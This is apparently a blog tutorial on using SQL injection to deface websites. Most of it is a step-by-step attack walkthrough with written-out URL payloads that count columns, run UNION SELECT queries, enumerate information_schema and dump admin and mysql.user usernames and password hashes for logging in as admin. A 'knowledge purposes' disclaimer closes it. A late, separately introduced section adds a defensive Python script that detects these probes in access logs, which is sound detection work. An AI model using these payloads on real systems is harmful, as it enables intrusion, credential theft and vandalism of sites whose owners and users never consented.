SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (for example, to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. So, let's learn how to deface websites using SQL injection with .
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
What Is Website Defacement?
Website defacement is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, like other forms of vandalism, is also used to spread messages by politically motivated "cyber protesters" or "hacktivists".
Defacing a website simply means replacing the index.html file of a site with the attacker's own file. All users who open the website will then see the page uploaded by the attacker.
Steps To Deface Websites Using SQL Injection:
1) Vulnerability Check:
To check whether a website is vulnerable to SQL injection, you need to find a page whose URL looks like this –
To test whether it's vulnerable, we add a ' (single quote) to the end of the URL, so that it looks like –
If the database is vulnerable, the page will spit out a MySQL error similar to –
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…"
That means the site is vulnerable to SQL injection; if the page loads as normal, then the website is not vulnerable to SQL injection.
2) Finding the number of columns:
To find the number of columns in the database, we'll use the ORDER BY clause, which tells the database how to order the result. We'll just increment the number until we get an error.
http://www.website.com/news.php?id=1 order by 1/* <– No Error
http://www.website.com/news.php?id=1 order by 2/* <– No Error
http://www.website.com/news.php?id=1 order by 3/* <– No Error
http://www.website.com/news.php?id=1 order by 4/* <– Error
We'll get a message like: Unknown column '4' in 'order clause', or something similar, which means the database has 3 columns, as we got an error on 4.
3) Check for UNION function:
We are now going to use the UNION command to find the vulnerable columns, because with UNION we can select more data in one SQL statement. So we have –
http://www.website.com/news.php?id=1 union all select 1,2,3/* (As we’ve already found that the number of columns is 3 in the second step.)
If we see some numbers on the screen, i.e. 1, 2 or 3, then the UNION works.
4) Check for Database Version:
We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:
Or if these don’t work then try:
The URL would look like:
http://www.website.com/news.php?id=1 union all select 1,user(),version(),3/*
If you get an error like "union + illegal mix of collations (IMPLICIT + COERCIBLE) …", then what we need is the convert() function (I didn't see any website article covering this problem, so I must cover it).
i.e. http://www.website.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*
Or with hex() and unhex():
i.e. http://www.website.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*
The resulting page would then show the database user and then the MySQL version, for example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 or above, read on to carry out the attack; if it is 4 or below, you have to brute force or guess the table and column names; programs can be used to do this.
5) Obtaining Table And Column Name:
In this step, we aim to list all the table names in the database. The "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, i.e. admin, member or user tables. But in most cases, we must guess the table and column names.
Common table names are: user/s, admin/s, member/s, etc.
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd, etc.
The URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good).
We know that the table admin exists. Now to check column names –
http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)
We get the username displayed on the screen; for example it would be admin, superadmin, etc. Now to check if the column password exists –
http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)
We'll see the password on the screen in hash or plain-text format; it depends on how the database is set up, i.e. MD5 hash, MySQL hash, SHA1, etc.
Now we must complete the query as we need. For that, we can use the concat() function (it joins strings).
i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*
Note: Here I used 0x3a, the hex value for a colon.
(Another way is to use the ASCII value for that, for example char(58).)
http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on the screen, i.e. admin:admin or admin:HACKAGON.
When you have this, you can log in as admin or some superuser. If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so the URL would be
http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
6) In Case of MySQL 5:
Up to step 5 is for MySQL version < 5 (i.e. 4.1.33, 4.1.12, etc.), but for MySQL 5 we need information_schema. It holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*
Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list all the tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note: Here I put 0,1 (get 1 result starting from the 0th).
Now to view the second table, we’ll change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table is displayed. Now for the third table, we put limit 2,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.
To get the column names, the method is the same, except that we use column_name and information_schema.columns. So the example would be –
http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is displayed. For the second one, we change limit 0,1 to limit 1,1:
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.
If you want to display column names for a specific table, use this query (WHERE clause). Let's say that we found the table users.
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we'll get the column names in the table users displayed. Using LIMIT we can list all columns in the table users.
Note: This won't work if magic quotes are ON.
Let's say that we found the columns user, pass, and email. Now complete the query to put them all together. For that we use concat(), as I used it earlier.
i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/
We'll get user:pass:email from the table users here. Example: admin:hash:firstname.lastname@example.org
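From the defender's side, every step above leaves a distinctive trail in the web server's access log: a lone quote after a numeric id, a run of ORDER BY N requests with increasing N, UNION SELECT, information_schema lookups and the trailing /* comment. The following is an added example, not code from the article, that scores such requests in Combined Log Format lines and aggregates them per client; the log lines, addresses and indicator names are constructed for the illustration. The last line (a search for O'Brien) is there to show why a bare quote on its own is a weak signal. It also helps to remember that the mysql.user query in step 5 only works when the application's database account can read that table, which a least-privilege account should not be able to do.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed Combined-Log-Format lines imitating the article's probes against news.php.
# The addresses are documentation ranges; nothing here is a real log.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=1' HTTP/1.1" 500 412
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /news.php?id=1%20order%20by%203/* HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:58 +0000] "GET /news.php?id=1%20order%20by%204/* HTTP/1.1" 500 412
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /news.php?id=1%20union%20all%20select%201,2,3/* HTTP/1.1" 200 5130
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=1%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%200,1/* HTTP/1.1" 200 5140
198.51.100.7 - - [10/Oct/2023:13:57:01 +0000] "GET /news.php?id=2 HTTP/1.1" 200 4980
198.51.100.7 - - [10/Oct/2023:13:57:05 +0000] "GET /search.php?q=O'Brien HTTP/1.1" 200 3011
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Indicators drawn from the article's own steps, matched against the decoded parameter value.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "comment_tail": re.compile(r"(/\*|--\s|#)\s*$"),
}


def analyze_value(value):
    """Return the list of indicator names that fire on one decoded parameter value."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    # A numeric id with a single quote appended is the article's step-1 probe;
    # a quote inside free text (O'Brien) is not flagged, which keeps false positives down.
    if re.fullmatch(r"\d+'", value):
        hits.append("quote_after_numeric_id")
    return hits


def analyze_log(text):
    """Parse access-log lines and return one finding per request that shows an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        status = int(m.group("status"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = analyze_value(value)
            if not hits:
                continue
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": parts.path,
                "param": key,
                "value": value,
                "status": status,
                "indicators": hits,
                # A 5xx on a probe means the database error reached the client (step 1's signal).
                "score": len(hits) + (1 if status >= 500 else 0),
            })
    return findings


def summarize(findings):
    """Aggregate findings per client so a full enumeration sequence stands out."""
    per_ip = defaultdict(lambda: {"requests": 0, "score": 0, "indicators": set()})
    for f in findings:
        entry = per_ip[f["ip"]]
        entry["requests"] += 1
        entry["score"] += f["score"]
        entry["indicators"].update(f["indicators"])
    return dict(per_ip)


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["path"], f["param"], repr(f["value"]), f["indicators"], f["score"])
    for ip, entry in summarize(found).items():
        print(ip, entry)
```

On the constructed log, five of the eight requests are flagged, all from the same client, and the two 500 responses on the quote and order by 4 probes raise that client's score further; the legitimate id=2 and O'Brien requests produce no findings. Correlating by client over a short window is what turns individual weak hits into a recognisable enumeration sequence.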
Note: This guide is only for knowledge purposes and shouldn't be used for any illegal activities, as we are not responsible for anything that happens with this.
Hope you like this article. Don't forget to share it with your friends, and feel free to drop a comment below if you still face any kind of problem.